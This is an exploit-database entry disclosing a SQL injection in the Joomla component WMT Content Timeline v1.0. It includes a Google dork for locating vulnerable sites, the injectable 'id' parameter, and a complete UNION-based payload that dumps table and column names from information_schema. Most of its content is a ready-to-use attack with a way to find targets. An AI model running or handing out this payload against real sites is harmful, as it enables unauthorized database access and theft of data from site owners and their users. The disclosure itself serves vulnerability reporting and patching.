# # # # # # Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection # Google Dork: inurl:index.php?option=com_wmt_content_timeline # Date: 17.02.2017 # Vendor Homepage: http://devecostudio.com # Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/ # Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL] # -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+- # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-18]